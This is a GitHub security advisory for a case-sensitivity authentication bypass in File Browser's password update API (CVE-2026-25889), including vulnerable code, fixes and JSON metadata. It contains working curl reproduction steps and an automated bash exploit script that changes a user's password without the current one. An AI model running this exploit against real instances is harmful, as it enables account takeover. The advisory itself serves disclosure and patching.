GHSA-HXW8-4H9J-HQ2R

Vulnerability from github – Published: 2026-02-10 00:22 – Updated: 2026-02-10 02:56
VLAI?
Summary
File Browser has an Authentication Bypass in User Password Update
Details

Security Advisory: Authentication Bypass in User Password Update

Summary

A case-sensitivity flaw in the password validation logic allows any authenticated user to change their password (or an admin to change any user's password) without providing the current password. By using Title Case field name "Password" instead of lowercase "password" in the API request, the current_password verification is completely bypassed. This enables account takeover if an attacker obtains a valid JWT token through XSS, session hijacking, or other means.

CVSS Score: 7.5 (High)
CWE: CWE-178 (Improper Handling of Case Sensitivity)

Details

The vulnerability exists in http/users.go in the userPutHandler function (lines 181-200).

Vulnerable Code

// http/users.go:181-200
if d.settings.AuthMethod == auth.MethodJSONAuth {
    var sensibleFields = map[string]struct{}{
        "all":          {},
        "username":     {},
        "password":     {},  // lowercase
        "scope":        {},
        "lockPassword": {},
        "commands":     {},
        "perm":         {},
    }

    for _, field := range req.Which {
        if _, ok := sensibleFields[field]; ok {  // Case-sensitive lookup
            if !users.CheckPwd(req.CurrentPassword, d.user.Password) {
                return http.StatusBadRequest, fberrors.ErrCurrentPasswordIncorrect
            }
            break
        }
    }
}

Root Cause

  1. The sensibleFields map uses lowercase keys (e.g., "password")
  2. The lookup sensibleFields[field] is case-sensitive
  3. When req.Which contains "Password" (Title Case), the lookup returns false
  4. The password verification block is skipped entirely
  5. Later in the code (line 229), field names are converted to Title Case for processing, so "Password" is a valid field name

Attack Flow

1. Attacker obtains victim's JWT token (via XSS, log leakage, etc.)
2. Attacker sends PUT /api/users/{id} with:
   - which: ["Password"]  (Title Case - bypasses validation)
   - data.password: "attacker_password"
   - NO current_password field required
3. Password is changed without verification
4. Victim is locked out, attacker has full access

PoC

Prerequisites

  • A valid JWT token for any user account
  • Target Filebrowser instance using JSON authentication (default)

Reproduction Steps

Step 1: Obtain a valid JWT token

TOKEN=$(curl -s -X POST "http://target:8080/api/login" \
  -H "Content-Type: application/json" \
  -d '{"username":"victim","password":"victim_password"}')

Step 2: Attempt normal password change (should fail)

curl -s -X PUT "http://target:8080/api/users/1" \
  -H "X-Auth: $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "what": "user",
    "which": ["password"],
    "data": {"id": 1, "password": "NewPassword123456"}
  }'
# Response: 400 Bad Request (the current password is incorrect)

Step 3: Bypass with Title Case (succeeds without current_password)

curl -s -X PUT "http://target:8080/api/users/1" \
  -H "X-Auth: $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "what": "user",
    "which": ["Password"],
    "data": {"id": 1, "password": "HackedPassword123"}
  }'
# Response: 200 OK

Step 4: Verify account takeover

# Original password no longer works
curl -s -X POST "http://target:8080/api/login" \
  -d '{"username":"victim","password":"victim_password"}'
# Response: 403 Forbidden

# New password works
curl -s -X POST "http://target:8080/api/login" \
  -d '{"username":"victim","password":"HackedPassword123"}'
# Response: Valid JWT token

Automated PoC Script

#!/bin/bash
# Usage: ./poc.sh <target> <username> <current_password> <new_password>

TARGET="$1"
USERNAME="$2"
CURRENT_PASS="$3"
NEW_PASS="$4"

# Login
TOKEN=$(curl -s -X POST "$TARGET/api/login" \
  -H "Content-Type: application/json" \
  -d "{\"username\":\"$USERNAME\",\"password\":\"$CURRENT_PASS\"}")

# Get user ID from token
USER_ID=$(echo "$TOKEN" | python3 -c "
import sys,json,base64
parts=input().split('.')
payload=json.loads(base64.b64decode(parts[1]+'=='))
print(payload['user']['id'])
")

# Exploit: Change password without current_password
curl -s -X PUT "$TARGET/api/users/$USER_ID" \
  -H "X-Auth: $TOKEN" \
  -H "Content-Type: application/json" \
  -d "{
    \"what\": \"user\",
    \"which\": [\"Password\"],
    \"data\": {\"id\": $USER_ID, \"password\": \"$NEW_PASS\"}
  }"

echo "Password changed to: $NEW_PASS"

Impact

Who is Impacted

  • All Filebrowser users using JSON authentication method (default configuration)
  • Any user whose JWT token can be obtained by an attacker
  • Particularly high-value targets: administrator accounts

Attack Scenarios

Scenario Impact
XSS + Token Theft Complete account takeover
JWT in Server Logs Mass account compromise
Shared Computer Session hijacking
Malicious Browser Extension Credential theft

Security Impact

Category Severity
Confidentiality High - Attacker gains full account access
Integrity High - Attacker can modify all user data
Availability High - Legitimate user locked out

Scope

  • The vulnerability affects password modification only
  • Other sensitive fields (Username, Scope, Perm, etc.) have additional protection via NonModifiableFieldsForNonAdmin check
  • However, for administrators, all fields can be modified using this bypass technique

Suggested Fix

Option 1: Case-insensitive field matching (Recommended)

// Convert field to lowercase before checking
for _, field := range req.Which {
    if _, ok := sensibleFields[strings.ToLower(field)]; ok {
        if !users.CheckPwd(req.CurrentPassword, d.user.Password) {
            return http.StatusBadRequest, fberrors.ErrCurrentPasswordIncorrect
        }
        break
    }
}

Option 2: Use Title Case in sensibleFields

var sensibleFields = map[string]struct{}{
    "All":          {},
    "Username":     {},
    "Password":     {},  // Title Case to match post-transformation
    "Scope":        {},
    "LockPassword": {},
    "Commands":     {},
    "Perm":         {},
}

// Check AFTER field name transformation
for k, v := range req.Which {
    v = cases.Title(language.English, cases.NoLower).String(v)
    req.Which[k] = v

    // Now check with Title Case
    if _, ok := sensibleFields[v]; ok {
        if !users.CheckPwd(req.CurrentPassword, d.user.Password) {
            return http.StatusBadRequest, fberrors.ErrCurrentPasswordIncorrect
        }
        break
    }
}

References

  • Affected File: http/users.go
  • Affected Lines: 181-200
  • Related Code: NonModifiableFieldsForNonAdmin (line 17)
Severity ?
5.4 (Medium)
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 2.57.0"
      },
      "package": {
        "ecosystem": "Go",
        "name": "github.com/filebrowser/filebrowser/v2"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.57.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-25889"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-178"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-02-10T00:22:33Z",
    "nvd_published_at": "2026-02-09T22:16:03Z",
    "severity": "MODERATE"
  },
  "details": "# Security Advisory: Authentication Bypass in User Password Update\n\n## Summary\n\nA case-sensitivity flaw in the password validation logic allows any authenticated user to change their password (or an admin to change any user\u0027s password) **without providing the current password**. By using Title Case field name `\"Password\"` instead of lowercase `\"password\"` in the API request, the `current_password` verification is completely bypassed. This enables account takeover if an attacker obtains a valid JWT token through XSS, session hijacking, or other means.\n\n**CVSS Score**: 7.5 (High)  \n**CWE**: CWE-178 (Improper Handling of Case Sensitivity)\n\n---\n\n## Details\n\nThe vulnerability exists in `http/users.go` in the `userPutHandler` function (lines 181-200).\n\n### Vulnerable Code\n\n```go\n// http/users.go:181-200\nif d.settings.AuthMethod == auth.MethodJSONAuth {\n    var sensibleFields = map[string]struct{}{\n        \"all\":          {},\n        \"username\":     {},\n        \"password\":     {},  // lowercase\n        \"scope\":        {},\n        \"lockPassword\": {},\n        \"commands\":     {},\n        \"perm\":         {},\n    }\n\n    for _, field := range req.Which {\n        if _, ok := sensibleFields[field]; ok {  // Case-sensitive lookup\n            if !users.CheckPwd(req.CurrentPassword, d.user.Password) {\n                return http.StatusBadRequest, fberrors.ErrCurrentPasswordIncorrect\n            }\n            break\n        }\n    }\n}\n```\n\n### Root Cause\n\n1. The `sensibleFields` map uses **lowercase** keys (e.g., `\"password\"`)\n2. The lookup `sensibleFields[field]` is **case-sensitive**\n3. When `req.Which` contains `\"Password\"` (Title Case), the lookup returns `false`\n4. The password verification block is skipped entirely\n5. Later in the code (line 229), field names are converted to Title Case for processing, so `\"Password\"` is a valid field name\n\n### Attack Flow\n\n```\n1. Attacker obtains victim\u0027s JWT token (via XSS, log leakage, etc.)\n2. Attacker sends PUT /api/users/{id} with:\n   - which: [\"Password\"]  (Title Case - bypasses validation)\n   - data.password: \"attacker_password\"\n   - NO current_password field required\n3. Password is changed without verification\n4. Victim is locked out, attacker has full access\n```\n\n---\n\n## PoC\n\n### Prerequisites\n- A valid JWT token for any user account\n- Target Filebrowser instance using JSON authentication (default)\n\n### Reproduction Steps\n\n**Step 1: Obtain a valid JWT token**\n```bash\nTOKEN=$(curl -s -X POST \"http://target:8080/api/login\" \\\n  -H \"Content-Type: application/json\" \\\n  -d \u0027{\"username\":\"victim\",\"password\":\"victim_password\"}\u0027)\n```\n\n**Step 2: Attempt normal password change (should fail)**\n```bash\ncurl -s -X PUT \"http://target:8080/api/users/1\" \\\n  -H \"X-Auth: $TOKEN\" \\\n  -H \"Content-Type: application/json\" \\\n  -d \u0027{\n    \"what\": \"user\",\n    \"which\": [\"password\"],\n    \"data\": {\"id\": 1, \"password\": \"NewPassword123456\"}\n  }\u0027\n# Response: 400 Bad Request (the current password is incorrect)\n```\n\n**Step 3: Bypass with Title Case (succeeds without current_password)**\n```bash\ncurl -s -X PUT \"http://target:8080/api/users/1\" \\\n  -H \"X-Auth: $TOKEN\" \\\n  -H \"Content-Type: application/json\" \\\n  -d \u0027{\n    \"what\": \"user\",\n    \"which\": [\"Password\"],\n    \"data\": {\"id\": 1, \"password\": \"HackedPassword123\"}\n  }\u0027\n# Response: 200 OK\n```\n\n**Step 4: Verify account takeover**\n```bash\n# Original password no longer works\ncurl -s -X POST \"http://target:8080/api/login\" \\\n  -d \u0027{\"username\":\"victim\",\"password\":\"victim_password\"}\u0027\n# Response: 403 Forbidden\n\n# New password works\ncurl -s -X POST \"http://target:8080/api/login\" \\\n  -d \u0027{\"username\":\"victim\",\"password\":\"HackedPassword123\"}\u0027\n# Response: Valid JWT token\n```\n\n### Automated PoC Script\n\n```bash\n#!/bin/bash\n# Usage: ./poc.sh \u003ctarget\u003e \u003cusername\u003e \u003ccurrent_password\u003e \u003cnew_password\u003e\n\nTARGET=\"$1\"\nUSERNAME=\"$2\"\nCURRENT_PASS=\"$3\"\nNEW_PASS=\"$4\"\n\n# Login\nTOKEN=$(curl -s -X POST \"$TARGET/api/login\" \\\n  -H \"Content-Type: application/json\" \\\n  -d \"{\\\"username\\\":\\\"$USERNAME\\\",\\\"password\\\":\\\"$CURRENT_PASS\\\"}\")\n\n# Get user ID from token\nUSER_ID=$(echo \"$TOKEN\" | python3 -c \"\nimport sys,json,base64\nparts=input().split(\u0027.\u0027)\npayload=json.loads(base64.b64decode(parts[1]+\u0027==\u0027))\nprint(payload[\u0027user\u0027][\u0027id\u0027])\n\")\n\n# Exploit: Change password without current_password\ncurl -s -X PUT \"$TARGET/api/users/$USER_ID\" \\\n  -H \"X-Auth: $TOKEN\" \\\n  -H \"Content-Type: application/json\" \\\n  -d \"{\n    \\\"what\\\": \\\"user\\\",\n    \\\"which\\\": [\\\"Password\\\"],\n    \\\"data\\\": {\\\"id\\\": $USER_ID, \\\"password\\\": \\\"$NEW_PASS\\\"}\n  }\"\n\necho \"Password changed to: $NEW_PASS\"\n```\n\n---\n\n## Impact\n\n### Who is Impacted\n\n- **All Filebrowser users** using JSON authentication method (default configuration)\n- Any user whose JWT token can be obtained by an attacker\n- Particularly high-value targets: administrator accounts\n\n### Attack Scenarios\n\n| Scenario | Impact |\n|----------|--------|\n| XSS + Token Theft | Complete account takeover |\n| JWT in Server Logs | Mass account compromise |\n| Shared Computer | Session hijacking |\n| Malicious Browser Extension | Credential theft |\n\n### Security Impact\n\n| Category | Severity |\n|----------|----------|\n| Confidentiality | **High** - Attacker gains full account access |\n| Integrity | **High** - Attacker can modify all user data |\n| Availability | **High** - Legitimate user locked out |\n\n### Scope\n\n- The vulnerability affects **password modification only**\n- Other sensitive fields (`Username`, `Scope`, `Perm`, etc.) have additional protection via `NonModifiableFieldsForNonAdmin` check\n- However, for **administrators**, all fields can be modified using this bypass technique\n\n---\n\n## Suggested Fix\n\n### Option 1: Case-insensitive field matching (Recommended)\n\n```go\n// Convert field to lowercase before checking\nfor _, field := range req.Which {\n    if _, ok := sensibleFields[strings.ToLower(field)]; ok {\n        if !users.CheckPwd(req.CurrentPassword, d.user.Password) {\n            return http.StatusBadRequest, fberrors.ErrCurrentPasswordIncorrect\n        }\n        break\n    }\n}\n```\n\n### Option 2: Use Title Case in sensibleFields\n\n```go\nvar sensibleFields = map[string]struct{}{\n    \"All\":          {},\n    \"Username\":     {},\n    \"Password\":     {},  // Title Case to match post-transformation\n    \"Scope\":        {},\n    \"LockPassword\": {},\n    \"Commands\":     {},\n    \"Perm\":         {},\n}\n\n// Check AFTER field name transformation\nfor k, v := range req.Which {\n    v = cases.Title(language.English, cases.NoLower).String(v)\n    req.Which[k] = v\n    \n    // Now check with Title Case\n    if _, ok := sensibleFields[v]; ok {\n        if !users.CheckPwd(req.CurrentPassword, d.user.Password) {\n            return http.StatusBadRequest, fberrors.ErrCurrentPasswordIncorrect\n        }\n        break\n    }\n}\n```\n\n---\n\n## References\n\n- Affected File: `http/users.go`\n- Affected Lines: 181-200\n- Related Code: `NonModifiableFieldsForNonAdmin` (line 17)",
  "id": "GHSA-hxw8-4h9j-hq2r",
  "modified": "2026-02-10T02:56:29Z",
  "published": "2026-02-10T00:22:33Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/filebrowser/filebrowser/security/advisories/GHSA-hxw8-4h9j-hq2r"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25889"
    },
    {
      "type": "WEB",
      "url": "https://github.com/filebrowser/filebrowser/commit/ff2f00498cff151e2fb1f5f0b16963bf33c3d6d4"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/filebrowser/filebrowser"
    },
    {
      "type": "WEB",
      "url": "https://github.com/filebrowser/filebrowser/releases/tag/v2.57.1"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "File Browser has an Authentication Bypass in User Password Update"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.